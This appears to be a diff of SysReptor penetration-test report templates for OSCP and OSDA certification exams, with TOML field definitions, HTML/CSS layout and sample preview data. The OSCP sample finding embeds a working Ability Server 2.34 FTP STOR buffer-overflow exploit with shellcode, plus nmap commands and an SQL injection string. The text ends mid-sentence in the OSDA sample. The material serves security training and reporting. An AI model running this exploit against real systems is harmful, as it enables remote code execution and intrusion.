{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) utilized a widely adopted approach to perform penetration testing that is effective in testing how well the Offensive Security Labs and Exam environments are secure. Below is a breakout of how {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was able to identify and exploit the variety of systems and includes all individual vulnerabilities found.
TODO Adapt as required
"""
required = true
[report_fields.penetration]
type = "markdown"
label = "Penetration"
origin = "custom"
default = """
The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems. During this penetration test, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was able to successfully gain access to 10 out of the 50 systems.
TODO Adapt as required
"""
required = true
[report_fields.report_date]
type = "date"
label = "Report Date"
origin = "custom"
required = true
[report_fields.serviceenum]
type = "markdown"
label = "Service Enumeration"
origin = "custom"
default = """
The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems. This is valuable for an attacker as it provides detailed information on potential attack vectors into a system. Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test. In some cases, some ports may not be listed.
TODO Adapt as required
"""
required = true
[report_fields.housecleaning]
type = "markdown"
label = "House Cleaning"
origin = "custom"
default = """
The house cleaning portions of the assessment ensures that remnants of the penetration test are removed. Often fragments of tools or user accounts are left on an organizations computer which can cause security issues down the road. Ensuring that we are meticulous and no remnants of our penetration test are left over is important.
After the trophies on both the lab network and exam network were completed, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) removed all user accounts and passwords as well as the Meterpreter services installed on the system. Offensive Security should not have to remove any user accounts or services from the system.
TODO Adapt as required
"""
required = true
[report_fields.infogathering]
type = "markdown"
label = "Information Gathering"
origin = "custom"
default = """
The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was tasked with exploiting the lab and exam network. The specific IP addresses were:
**Exam Network:**
* 172.16.203.133
* 172.16.203.134
* 172.16.203.135
* 172.16.203.136
TODO Adapt as required
"""
required = true
[report_fields.maintainaccess]
type = "markdown"
label = "Maintaining Access"
origin = "custom"
default = """
Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable. The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again. Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.
{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) added administrator and root level accounts on all systems compromised. In addition to the administrative/root access, a Metasploit meterpreter service was installed on the machine to ensure that additional access could be established.
TODO Adapt as required
"""
required = true
[report_fields.report_version]
type = "string"
label = "Report Version"
origin = "custom"
default = "1.0"
required = true
spellcheck = false
[report_fields.recommendations]
type = "markdown"
label = "Recommendations"
origin = "custom"
default = """
{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) recommends patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date.
TODO Adapt as required
"""
required = true
[report_fields.appendix_sections]
type = "list"
label = "Appendix"
origin = "custom"
required = true
[report_fields.appendix_sections.items]
type = "object"
label = ""
origin = "custom"
[report_fields.appendix_sections.items.properties]
[report_fields.appendix_sections.items.properties.title]
type = "string"
label = "Title"
origin = "custom"
default = "TODO appendix title"
required = true
spellcheck = false
[report_fields.appendix_sections.items.properties.content]
type = "markdown"
label = "Content"
origin = "custom"
default = "TODO appendix content"
required = true
[report_fields.highlevel_summary]
type = "markdown"
label = "High-Level Summary"
origin = "custom"
default = """
{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was tasked with performing an internal penetration test towards Offensive Security Labs. An internal penetration test is a dedicated attack against internally connected systems. The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate Offensive Securitys internal lab systems the THINC.local domain. {{ report.firstname }} {{ report.lastname}}s ({{ report.osid}}) overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.
When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Securitys network. When performing the attacks, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the testing, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) had administrative level access to multiple systems. All systems were successfully exploited and access granted.
TODO Adapt summary as required
"""
required = true
[[report_sections]]
id = "Student"
label = "Student"
fields = [
"firstname",
"lastname",
"osid",
"mail",
]
[[report_sections]]
id = "other"
label = "Document Control"
fields = [
"title",
"report_date",
"report_version",
"watermark",
]
[[report_sections]]
id = "high-level_summary"
label = "High-Level Summary"
fields = [
"highlevel_summary",
"recommendations",
]
[[report_sections]]
id = "methodology"
label = "Methodologies"
fields = [
"methodology",
"infogathering",
"serviceenum",
"penetration",
"maintainaccess",
"housecleaning",
]
[[report_sections]]
id = "appendix"
label = "Appendix"
fields = [
"appendix_sections",
]
[finding_fields]
[finding_fields.title]
type = "string"
label = "Target Name"
origin = "core"
default = "TODO Target Name"
required = true
spellcheck = true
[finding_fields.cvss]
type = "cvss"
label = "CVSS"
origin = "core"
default = "n/a"
required = true
[finding_fields.ip_address]
type = "string"
label = "IP Address"
origin = "custom"
default = "TODO IP Address"
required = true
spellcheck = false
[finding_fields.serviceenum]
type = "markdown"
label = "Service Enumeration"
origin = "custom"
default = """
**Port Scan Results**
| IP Address | Ports Open |
| ------- | ------- |
| TODO | TODO **TCP:** **UDP:**
TODO
* `nmap -Pn -n 8.8.8.8 | grep open | cut -d/ -f1 | sed 'N;s/\\n/, /g'` for comma separated TCP ports
* `nmap -sU -Pn -n 8.8.8.8 | grep open | cut -d/ -f1 | sed 'N;s/\\n/, /g'` for comma separated UDP ports
**TODO further enumeration results**
"""
required = true
[finding_fields.initialaccess]
type = "markdown"
label = "Initial Access"
origin = "custom"
default = """
**Vulnerability Explation:** TODO
**Vulnerability Fix:** TODO
**Steps to reproduce the attack:** TODO
**Proof of Concept Code:** TODO
"""
required = true
[finding_fields.postexploitation]
type = "markdown"
label = "Post Exploitation"
origin = "custom"
default = "**System Proof Screenshot:** TODO"
required = true
[finding_fields.isActiveDirectory]
type = "boolean"
label = "is Active Directory Set?"
origin = "custom"
default = false
[finding_fields.privilegeescalation]
type = "markdown"
label = "Privilege Escalation"
origin = "custom"
default = """
**Vulnerability Explanation:** TODO
**Vulnerability Fix:** TODO
**Steps to reproduce the attack:** TODO
**Proof of Concept Code:** TODO
"""
required = true
[report_preview_data]
[report_preview_data.report]
title = "OSCP Penetration Test Report"
mail = "student@example.com"
osid = "OS-XXXXX"
watermark = true
methodology = "{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) utilized a widely adopted approach to perform penetration testing that is effective in testing how well the Offensive Security Labs and Exam environments are secure. Below is a breakout of how {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was able to identify and exploit the variety of systems and includes all individual vulnerabilities found."
penetration = "The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems. During this penetration test, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was able to successfully gain access to 10 out of the 50 systems."
report_date = "2022-07-29"
serviceenum = "The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems. This is valuable for an attacker as it provides detailed information on potential attack vectors into a system. Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test. In some cases, some ports may not be listed."
housecleaning = """
The house cleaning portions of the assessment ensures that remnants of the penetration test are removed. Often fragments of tools or user accounts are left on an organizations computer which can cause security issues down the road. Ensuring that we are meticulous and no remnants of our penetration test are left over is important.
After the trophies on both the lab network and exam network were completed, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) removed all user accounts and passwords as well as the Meterpreter services installed on the system. Offensive Security should not have to remove any user accounts or services from the system.
"""
infogathering = """
The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was tasked with exploiting the lab and exam network. The specific IP addresses were:
**Exam Network:**
* 172.16.203.133
* 172.16.203.134
* 172.16.203.135
* 172.16.203.136
"""
maintainaccess = """
Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable. The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again. Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.
{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) added administrator and root level accounts on all systems compromised. In addition to the administrative/root access, a Metasploit meterpreter service was installed on the machine to ensure that additional access could be established.
"""
report_version = "1.0"
recommendations = "{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) recommends patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date."
appendix_sections = []
highlevel_summary = """
{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was tasked with performing an internal penetration test towards Offensive Security Labs. An internal penetration test is a dedicated attack against internally connected systems. The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate Offensive Securitys internal lab systems the THINC.local domain. {{ report.firstname }} {{ report.lastname}}s ({{ report.osid}}) overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.
When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Securitys network. When performing the attacks, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the testing, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) had administrative level access to multiple systems. All systems were successfully exploited and access granted.
"""
firstname = "John"
lastname = "Doe"
[[report_preview_data.findings]]
title = "Target #1"
cvss = "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
id = "c7f12f17-96bf-4899-b10f-2b1a513382e8"
ip_address = "172.16.203.134"
serviceenum = """
**Port Scan Results**
| IP Address | Ports Open |
| ------- | ------- |
| 172.16.203.134 | **TCP:** 22, 79, 80, 105, 106, 110, 135, 139, 143, 445, 2224, 3306, 3389 |
**FTP Enumeration**
Upon manual enumeration of the available FTP service, John noticed it was running an outdated version 2.3.4 that is prone to the remote buffer overflow vulnerability.
"""
initialaccess = """
**Vulnerability Explanation:** Ability Server 2.34 is subject to a buffer overflow vulnerability in STOR field. Attackers can use this vulnerability to cause arbitrary remote code execution and take completely control over the system.
**Vulnerability Fix:** The publishers of the Ability Server have issued a patch to fix this known issue. It can be found here: [http://www.code-crafters.com/abilityserver/](http://www.code-crafters.com/abilityserver/)
**Steps to reproduce the attack:** The operating system was different from the known public exploit. A rewritten exploit was needed in order for successful code execution to occur. Once the exploit was rewritten, a targeted attack was performed on the system which gave John full administrative access over the system.
**Proof of Concept Code:**
```python highlight-manual
###################################
# Ability Server 2.34 FTP STOR Buffer Overflow # Advanced, secure and easy to use FTP Server. # 21 Oct 2004 - muts ###################################
# D:\\BO>ability-2.34-ftp-stor.py ###################################
# D:\\data\\tools>nc -v 127.0.0.1 4444
# localhost [127.0.0.1] 4444 (?) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# D:\\Program Files\\abilitywebserver> ###################################
import ftplib
from ftplib import FTP
import struct
print "\\n\\n################################"
print "\\nAbility Server 2.34 FTP STOR buffer Overflow" print "\\nFor Educational Purposes Only!\\n"
print "###################################"
# Shellcode taken from Sergio Alvarez's "Win32 Stack Buffer Overflow Tutorial"
sc = "\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x5e\\x81\\x73\\x17\\xe0\\x66"
sc += "\\x1c\\xc2\\x83\\xeb\\xfc\\xe2\\xf4\\x1c\\x8e\\x4a\\xc2\\xe0\\x66\\x4f\\x97\\xb6"
sc += "\\x1a\\x38\\xd6\\x95\\x87\\x97\\x98\\xc4\\x67\\xf7\\xa4\\x6b\\x6a\\x57\\x49\\xba"
sc += "\\x7a\\x1d\\x29\\x6b\\x62\\x97\\xc3\\x08\\x8d\\x1e\\xf3\\x20\\x39\\x42\\x9f\\xbb"
sc += "\\xa4\\x14\\xc2\\xbe\\x0c\\x2c\\x9b\\x84\\xed\\x05\\x49\\xbb\\x6a\\x97\\x99\\xfc"
sc += "\\xed\\x07\\x49\\xbb\\x6e\\x4f\\xaa\\x6e\\x28\\x12\\x2e\\x1f\\xb0\\x95\\x05\\x61"
sc += "\\x8a\\x1c\\xc3\\xe0\\x66\\x4b\\x94\\xb3\\xef\\xf9\\x2a\\xc7\\x66\\x1c\\xc2\\x70"
sc += "\\x67\\x1c\\xc2\\x56\\x7f\\x04\\x25\\x44\\x7f\\x6c\\x2b\\x05\\x2f\\x9a\\x8b\\x44"
sc += "\\x7c\\x6c\\x05\\x44\\xcb\\x32\\x2b\\x39\\x6f\\xe9\\x6f\\x2b\\x8b\\xe0\\xf9\\xb7"
sc += "\\x35\\x2e\\x9d\\xd3\\x54\\x1c\\x99\\x6d\\x2d\\x3c\\x93\\x1f\\xb1\\x95\\x1d\\x69"
sc += "\\xa5\\x91\\xb7\\xf4\\x0c\\x1b\\x9b\\xb1\\x35\\xe3\\xf6\\x6f\\x99\\x49\\xc6\\xb9"
sc += "\\xef\\x18\\x4c\\x02\\x94\\x37\\xe5\\xb4\\x99\\x2b\\x3d\\xb5\\x56\\x2d\\x02\\xb0"
sc += "\\x36\\x4c\\x92\\xa0\\x36\\x5c\\x92\\x1f\\x33\\x30\\x4b\\x27\\x57\\xc7\\x91\\xb3"
sc += "\\x0e\\x1e\\xc2\\xf1\\x3a\\x95\\x22\\x8a\\x76\\x4c\\x95\\x1f\\x33\\x38\\x91\\xb7"
sc += "\\x99\\x49\\xea\\xb3\\x32\\x4b\\x3d\\xb5\\x46\\x95\\x05\\x88\\x25\\x51\\x86\\xe0"
sc += "\\xef\\xff\\x45\\x1a\\x57\\xdc\\x4f\\x9c\\x42\\xb0\\xa8\\xf5\\x3f\\xef\\x69\\x67"
sc += "\\x9c\\x9f\\x2e\\xb4\\xa0\\x58\\xe6\\xf0\\x22\\x7a\\x05\\xa4\\x42\\x20\\xc3\\xe1"
sc += "\\xef\\x60\\xe6\\xa8\\xef\\x60\\xe6\\xac\\xef\\x60\\xe6\\xb0\\xeb\\x58\\xe6\\xf0"
sc += "\\x32\\x4c\\x93\\xb1\\x37\\x5d\\x93\\xa9\\x37\\x4d\\x91\\xb1\\x99\\x69\\xc2\\x88"
sc += "\\x14\\xe2\\x71\\xf6\\x99\\x49\\xc6\\x1f\\xb6\\x95\\x24\\x1f\\x13\\x1c\\xaa\\x4d"
sc += "\\xbf\\x19\\x0c\\x1f\\x33\\x18\\x4b\\x23\\x0c\\xe3\\x3d\\xd6\\x99\\xcf\\x3d\\x95"
sc += "\\x66\\x74\\x32\\x6a\\x62\\x43\\x3d\\xb5\\x62\\x2d\\x19\\xb3\\x99\\xcc\\xc2"
# Change RET address if need be.
buffer = §§'\\x41'*966+struct.pack('<L', 0x7C2FA0F7)+'\\x42'*32+sc§§ # RET Windows 2000 Server SP4
#buffer = '\\x41'*970+struct.pack('<L', 0x7D17D737)+'\\x42'*32+sc # RET Windows XP SP2 try:
# Edit the IP, Username and Password.
ftp = FTP('§§127.0.0.1§§')
ftp.login('§§ftp§§','§§ftp§§')
print "\\nEvil Buffer sent..."
print "\\nTry connecting with netcat to port 4444 on the remote machine." except:
print "\\nCould not Connect to FTP Server."
try:
ftp.transfercmd("STOR " + buffer)
except:
print "\\nDone."
```
"""
postexploitation = ""
isActiveDirectory = false
privilegeescalation = """
**Vulnerability Explation:** After establishing a foothold on target, John noticed there were several applications running locally, one of them, a custom web application on port 80 was prone to SQL Injection attacks. Using Chisel for port forwarding, John was able to access the web application. When performing the penetration test, John noticed error-based MySQL Injection on the taxid query string parameter. While enumerating table data, John was able to successfully extract the database root account login and password credentials that were unencrypted that also matched username and password accounts for the administrative user account on the system and John was able to log in remotely using RDP. This allowed for a successful breach of the operating system as well as all data contained on the system.
**Vulnerability Fix:** Since this is a custom web application, a specific update will not properly solve this issue. The application will need to be programmed to properly sanitize user-input
data, ensure that the user is running off of a limited user account, and that any sensitive data stored within the SQL database is properly encrypted. Custom error messages are highly recommended, as it becomes more challenging for the attacker to exploit a given weakness if errors are not being presented back to them.
**Steps to reproduce the attack:**
```
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE %root%"
```
"""
[[assets]]
id = "0b55fb94-e829-453b-9ef7-8d066210b83a"
name = "LICENSE"

21
demo_data/offsec-designs/osda-assets/LICENSE Normal file
View File

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

BIN
demo_data/offsec-designs/osda-assets/image-127195.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 169 KiB

BIN
demo_data/offsec-designs/osda-assets/image-152717.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 28 KiB

BIN
demo_data/offsec-designs/osda-assets/image-322213.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 118 KiB

BIN
demo_data/offsec-designs/osda-assets/image-590869.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 55 KiB

BIN
demo_data/offsec-designs/osda-assets/image-608270.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 33 KiB

BIN
demo_data/offsec-designs/osda-assets/image-781171.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 46 KiB

BIN
demo_data/offsec-designs/osda-assets/image-916547.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 31 KiB

BIN
demo_data/offsec-designs/osda-assets/image.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 14 KiB

703
demo_data/offsec-designs/osda.toml Normal file
View File

@ -0,0 +1,703 @@
format = "projecttypes/v1"
id = "431ca4e2-14f4-41bc-a431-07e8002b45de"
name = "OSDA Exam Report v1.1"
language = "en-US"
finding_field_order = [
"title",
"steps",
"cvss",
]
report_template = """
<div id="footer" data-sysreptor-generated="page-footer">
<div id="footer-left"><em>CONFIDENTIAL</em></div>
<div id="footer-center">{{ report.title }}</div>
</div>
<div v-if="report.watermark" id="watermark-osid">{{ report.osid }}</div>
<section id="page-cover" data-sysreptor-generated="page-cover">
<div id="page-cover-background" />
<div id="page-cover-title">
<h1>Offensive Security</h1>
<h2>{{ report.title }}</h2>
</div>
<div id="page-cover-student">
<p id="page-cover-osid">
<strong>OSID: {{ report.osid }}</strong><br>
{{ report.mail }}<br>
</p>
<p id="page-cover-meta">
{{ formatDate(report.report_date, 'long') }}<br>
v{{ report.report_version }}
</p>
</div>
</section>
<pagebreak />
<table-of-contents id="toc" v-slot="tocItems">
<h1>Table of Contents</h1>
<ul>
<li v-for="item in tocItems" :class="'toc-level' + item.level">
<ref :to="item.id" />
</li>
</ul>
<pagebreak />
</table-of-contents>
<markdown>
# Offensive Security OSDA Exam Documentation {.in-toc.numbered}
The Offensive Security Exam report contains all efforts that were conducted in order to pass the Offensive Security certification test. This report should contain all items that were used to pass the exam and it will be graded from a standpoint of correctness and fullness to all aspects of the exam. The purpose of this report is to ensure that the student has a full understanding of security detection methodologies as well as the technical knowledge to pass the qualifications for the Offensive Security Defense Analyst.
## Objective {.in-toc.numbered}
The objective of this assessment is to perform detections and analysis on the simulated exam network in order to determine which attacker actions took place in each of the 10 phases.
An example page has already been created for you at the latter portions of this document that should demonstrate the amount of information and detail that is expected in the exam report. Use the sample report as a guideline to get you through the reporting.
## Requirements {.in-toc.numbered}
The student will be required to fill out this penetration testing report fully and to include the following sections:
* Overall High-Level Summary of level of compromise
* Detailed walkthrough of attacker actions in each phase
* Each finding with included screenshots, explanations, event / log entries, and KQL queries if applicable
</markdown>
<pagebreak />
<section>
<h1 id="summary" class="in-toc numbered">High-Level Summary</h1>
<markdown :text="report.highlevel_summary" />
<pagebreak />
</section>
<section>
<h1 id="findings" class="in-toc numbered">Phases</h1>
<div v-for="finding in findings">
<h2 :id="finding.id" class="in-toc numbered">{{ finding.title }}</h2>
<div v-for="step in finding.steps">
<h3 class="in-toc numbered">{{ step.a_step_title }}</h3>
<markdown :text="step.b_step_details" />
</div>
<pagebreak />
</div>
</section>
<section v-if="report.appendix_sections.length > 0" class="appendix">
<h1 id="appendix" class="in-toc numbered">Appendix</h1>
<div v-for="appendix_section in report.appendix_sections">
<h2 class="in-toc numbered">{{ appendix_section.title }}</h2>
<markdown :text="appendix_section.content" />
</div>
<pagebreak />
</section>
<section>
<div class="end-of-report">
End of Report<br>
</div>
<div class="end-of-report">
This report was rendered<br>
by <a href="https://docs.sysreptor.com/">SysReptor</a> with<br>
<span style="color:red;">&hearts;</span><br>
</div>
</section>
"""
report_styles = """
@import "/assets/global/base.css";
/* Define variables */
:root {
--color-risk-critical: #E83221;
--color-risk-high: #FF9300;
--color-risk-medium: #FFDA00;
--color-risk-low: #4285F5;
--color-risk-info: #00AE51;
--color-cover-page-bg: #005ad0;
}
/* Font settings */
html {
font-family: "Noto Sans", sans-serif;
font-size: 10pt;
}
/* Global styles */
@page {
size: A4 portrait;
margin: 35mm 20mm 25mm 20mm;
}
a {
font-style: italic;
text-decoration: none;
color: inherit;
}
pre code {
border: 1px solid black;
padding: 0.2em !important;
}
code {
background-color: rgb(221, 221, 221);
}
th {
background-color: #ABABAB;
font-weight: bold;
}
tr.table-row-link td {
padding: 0;
}
tr.table-row-link td a {
display: block;
padding: 0.3em;
color: inherit;
text-decoration: none;
font-style: inherit;
}
.table-key {
background-color: #ABABAB;
}
/* Classes for risk colors */
.risk-critical { color: var(--color-risk-critical) !important; font-weight: bold; }
.risk-high { color: var(--color-risk-high) !important; font-weight: bold; }
.risk-medium { color: var(--color-risk-medium) !important; font-weight: bold; }
.risk-low { color: var(--color-risk-low) !important; font-weight: bold; }
.risk-info { color: var(--color-risk-info) !important; font-weight: bold; }
.risk-bg-critical { background-color: var(--color-risk-critical) !important; color: white !important; }
.risk-bg-high { background-color: var(--color-risk-high) !important; }
.risk-bg-medium { background-color: var(--color-risk-medium) !important; }
.risk-bg-low { background-color: var(--color-risk-low) !important; }
.risk-bg-info { background-color: var(--color-risk-info) !important; }
/* Helper class for referencing page number */
.ref-page::before {
content: "" !important;
}
.ref-page::after {
content: target-counter(attr(href), page) !important;
}
.ref-page .ref-title {
display: none !important;
}
/* Table in finding chapters */
.finding-heading .table-key {
height: 3em;
width: 10em;
}
.end-of-report {
text-align:center;
font-style:italic;
margin-top:70px;
line-height:1.7;
}
/* #region footer */
@page {
@bottom-left { content: element(footer-left); }
@bottom-center { content: element(footer-center); }
@bottom-right-corner { content: counter(page); }
}
#footer #footer-left { position: running(footer-left); }
#footer #footer-center { position: running(footer-center); }
/* #endregion footer */
/* #region watermark */
#watermark-osid {
position: fixed;
top: 9cm;
left: 1cm;
transform: rotate(-45deg);
font-size: 90pt;
text-transform: uppercase;
opacity: 0.2;
}
/* #endregion watermark */
/* #region page-cover */
@page :first {
/* Footer on the cover page */
@bottom-right-corner {
content: "";
}
@bottom-right {
/* Page number */
content: counter(page);
font-size: 9pt;
color: white
}
@bottom-left {
content: "Confidential";
text-transform: uppercase;
font-style: italic;
color: white;
}
/* Pentest title should not appear on cover page */
@bottom-center {
content: '';
}
}
#page-cover-background{
position: absolute;
margin-top: -35mm;
margin-left: -20mm;
width: 210mm;
height: 297mm;
background-color: var(--color-cover-page-bg);
}
/* Title page elements */
#page-cover-title {
position: absolute;
top: 20mm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-title h1 {
font-size: 32pt;
}
#page-cover-title h2 {
font-size: 24pt;
}
#page-cover-student {
position: absolute;
top: 11cm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-osid {
font-size: 14pt;
}
#page-cover-meta {
line-height: 2em;
}
/* #endregion page-cover */
/* #region toc */
#toc li {
list-style: none;
margin: 0;
padding: 0;
}
#toc .ref::before {
padding-right: 0.5em;
}
#toc .ref::after {
content: " " leader(".") " " target-counter(attr(href), page);
}
#toc .toc-level1 {
font-size: 1.5rem;
font-weight: bold;
margin-top: 0.8rem;
}
#toc .toc-level2 {
font-size: 1.2rem;
font-weight: bold;
margin-top: 0.5rem;
margin-left: 2rem;
}
#toc .toc-level3 {
font-size: 1rem;
margin-top: 0.4rem;
margin-left: 4rem;
}
#toc .toc-level4 {
font-size: 1rem;
margin-top: 0;
margin-left: 6rem;
}
/* #endregion toc */
"""
[report_fields]
[report_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "OSDA Exam Documentation"
required = true
spellcheck = true
[report_fields.mail]
type = "string"
label = "Mail"
origin = "custom"
default = "student@example.com"
required = true
spellcheck = false
[report_fields.osid]
type = "string"
label = "OSID"
origin = "custom"
default = "XXXXX"
required = true
spellcheck = false
[report_fields.lastname]
type = "string"
label = "Lastname"
origin = "custom"
default = "Doe"
required = true
spellcheck = false
[report_fields.firstname]
type = "string"
label = "Firstname"
origin = "custom"
default = "John"
required = true
spellcheck = false
[report_fields.watermark]
type = "boolean"
label = "Watermark"
origin = "custom"
default = false
[report_fields.report_date]
type = "date"
label = "Report Date"
origin = "custom"
required = true
[report_fields.report_version]
type = "string"
label = "Report Version"
origin = "custom"
default = "1.0"
required = true
spellcheck = false
[report_fields.appendix_sections]
type = "list"
label = "Appendix"
origin = "custom"
required = true
[report_fields.appendix_sections.items]
type = "object"
label = ""
origin = "custom"
[report_fields.appendix_sections.items.properties]
[report_fields.appendix_sections.items.properties.title]
type = "string"
label = "Title"
origin = "custom"
default = "TODO appendix title"
required = true
spellcheck = false
[report_fields.appendix_sections.items.properties.content]
type = "markdown"
label = "Content"
origin = "custom"
default = "TODO This section is placed for any additional items that were not mentioned in the overall report."
required = true
[report_fields.highlevel_summary]
type = "markdown"
label = "High-Level Summary"
origin = "custom"
default = """
TODO This report details and documents the attacks observed against the Offensive Security OSDA exam network.
The attacker organization started by performing a brute force against an internet accessible RDP server called APPSRV02 and obtained administrative access. This led to a complete compromise of the server.
Next the attacker performed lateral movement to the internal server APPSRV02 by reusing stolen credentials from APPSRV02, this also led to a complete compromise of APPSRV03.
[]
"""
required = true
[[report_sections]]
id = "Student"
label = "Student"
fields = [
"firstname",
"lastname",
"osid",
"mail",
]
[[report_sections]]
id = "other"
label = "Document Control"
fields = [
"title",
"report_date",
"report_version",
"watermark",
]
[[report_sections]]
id = "highlevel_summary"
label = "High-Level Summary"
fields = [
"highlevel_summary",
]
[[report_sections]]
id = "appendix"
label = "Appendix"
fields = [
"appendix_sections",
]
[finding_fields]
[finding_fields.title]
type = "string"
label = "Phase"
origin = "core"
default = "TODO Phase Name"
required = true
spellcheck = true
[finding_fields.cvss]
type = "cvss"
label = "CVSS (not required)"
origin = "core"
default = "n/a"
required = false
[finding_fields.steps]
type = "list"
label = "Steps"
origin = "custom"
required = true
[finding_fields.steps.items]
type = "object"
label = ""
origin = "custom"
[finding_fields.steps.items.properties]
[finding_fields.steps.items.properties.a_step_title]
type = "string"
label = "Step Title"
origin = "custom"
default = "TODO step title"
required = true
spellcheck = false
[finding_fields.steps.items.properties.b_step_details]
type = "markdown"
label = "Step Details"
origin = "custom"
default = "TODO step details"
required = true
[report_preview_data]
[report_preview_data.report]
title = "OSDA Exam Documentation"
mail = "student@example.com"
osid = "OS-XXXXX"
watermark = true
report_date = "2022-07-29"
report_version = "1.0"
highlevel_summary = """
TODO This report details and documents the attacks observed against the Offensive Security OSDA exam network.
The attacker organization started by performing a brute force against an internet accessible RDP server called APPSRV02 and obtained administrative access. This led to a complete compromise of the server.
Next the attacker performed lateral movement to the internal server APPSRV02 by reusing stolen credentials from APPSRV02, this also led to a complete compromise of APPSRV03.
[]
"""
firstname = "John"
lastname = "Doe"
[[report_preview_data.report.appendix_sections]]
title = "Appendix Title"
content = "Appendix content"
[[report_preview_data.findings]]
title = "Phase 1"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
id = "90a0038a-3649-4a37-8151-06c935a5a15e"
[[report_preview_data.findings.steps]]
a_step_title = "RDP Brute Force"
b_step_details = """
The initial indicator of an attack happening was the triggering of a pre-defined threshold rule called Possible RDP brute force as shown below.
![](/assets/name/image-590869.png)
By looking at how the rule was defined, it is triggered by more than 100 instances of event ID 4625, which is a failed logon. This could align with a brute force attack where the attacker makes use of a user and/or password list.
When we inspect some of the events that triggered the alert, as shown below, we notice that the server reporting the events is APPSRV02.
![](/assets/name/image-127195.png)
Given that an attacker may have attempted to brute force the server, we should search for a subsequent successful log on event to APPSRV02 to determine if they obtained access.
We do this with the following KQL query:
